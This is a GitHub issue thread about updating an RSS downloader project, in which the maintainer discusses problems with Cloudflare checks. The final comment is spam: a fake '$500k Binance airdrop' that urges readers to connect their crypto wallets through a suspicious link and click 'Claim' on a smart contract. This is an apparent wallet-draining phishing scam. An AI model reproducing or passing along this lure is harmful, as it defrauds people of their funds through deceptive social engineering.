### ISSUE TITLE
Info

### ISSUE THREAD

**Issue by DroneTechTI** [karl0ss/JDRssDownloader#9]
Hello congratulations for the project, I wanted to know if you are going to update it. It has been a long time since it is no longer active. Thank you very much

**Comment by karl0ss** [comment]
Hey @DevilStyle I have been really busy recently, but am off work next week, so I will get it back and up and working then, can you just responded with your issue so I can confirm it is the same as what I see? I may need the rss feed you are using, for what I have seen, it is cloudflare checks that I am not catering for, so I should be able to fix that...I hope..

**Comment by karl0ss** [comment]
Also, are you using the Release version or from code?

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @
